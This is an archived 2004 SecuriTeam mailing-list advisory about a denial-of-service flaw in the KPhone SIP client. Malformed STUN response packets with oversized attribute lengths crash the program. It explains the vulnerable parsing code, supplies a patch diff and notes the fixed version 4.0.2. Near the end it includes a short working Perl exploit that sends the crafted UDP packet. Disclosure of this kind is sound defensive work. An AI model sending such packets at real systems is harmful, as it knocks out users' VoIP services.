[UNIX] KPhone STUN DoS (Malformed STUN Packets)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/15/04
- Previous message: SecuriTeam: "[NT] WinSCP Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Apr 2004 20:01:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
KPhone STUN DoS (Malformed STUN Packets)
------------------------------------------------------------------------
SUMMARY
<http://www.wirlab.net/kphone/> KPhone is "a SIP (Session Initiation
Protocol) user agent for Linux, with which you can initiate VoIP (Voice
over IP) connections over the Internet". KPhone allows its users to enable
STUN server interconnectivity. This interconnectivity allows a remote
attacker to crash the KPhone program by sending it a malformed STUN
response packet. The vulnerability doesn't allow the attacker to execute
arbitrary code, but only to cause a denial of service attack (the program
will crash).
DETAILS
Vulnerable Systems:
* KPhone version 4.0.1 and prior
Immune Systems:
* KPhone version 4.0.2 or newer
The vulnerability lies in the fact the size of the received packet is not
verified against its user defined size. The vulnerable code lies at
(sipclient.cpp):
void SipClient::incomingMessage( int socketfd )
..
char inputbuf[ 8000 ];
..
StunMsgHdr* hdr = reinterpret_cast( inputbuf );
..
char* body = inputbuf + sizeof( StunMsgHdr );
unsigned int size = ntohs( hdr->msgLength ); // The size comes from msgLen
..
while( size > 0 ) {
StunAtrHdr* attr = reinterpret_cast( body );
unsigned int hdrLen = ntohs( attr->length );
..
body += hdrLen+4; // The hdrLen comes from the attrLen
size -= hdrLen+4;
}
As attrLen can be set to a bigger value than 8000 (the longest value we
can place in hdrLen is 0xFFFF = 65535), we can cause the body pointer to
point to a memory location outside the scope of our function, thus causing
a SEGFAULT.
Patch:
Beyond Security has written a patch that will make sure that the data
received is indeed safe for parsing (verifying all of the msgLen and
hdrLen)
356a357,362
> // check that the size of the header isn't larger than what we've read
> if ((signed int)sizeof(StunMsgHdr) > bytesread)
> {
> printf("Malformed packet (sizeof(StunMsgHdr) > bytesread)\n");
> return;
> }
357a364,369
> // check that the msg length + the hdr length is exactly what we've
read
> if( (signed int)(ntohs(hdr->msgLength) + sizeof(StunMsgHdr)) !=
bytesread)
> {
> printf("Malformed packet (hdr->msgLength + sizeof(StunMsgHdr)) !=
bytesread)\n");
> return;
> }
365a378,383
> // check that our attribute length is not larger than the remaining
size
> if (hdrLen+4 > size)
> {
> printf("Malformed packet (hdrLen+4 > size)\n");
> return;
> }
Vendor status:
The vendor has issued a new version 4.0.2, which address this issue.
Exploit:
#!/usr/bin/perl
#
use IO::Socket::INET;
my $buf = join("", "\x01\x01", # BindingResponse
"\x00\x01", # MsgLength
"A"x16, # GUID
"\x00\x00", # Attribute
"\x08\x01", # AttrLength
"A"x7975 # Value
);
my $remote = IO::Socket::INET->new( Proto => 'udp',
PeerAddr => '192.168.1.49',
PeerPort => 5060);
print $remote $buf;
ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] WinSCP Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
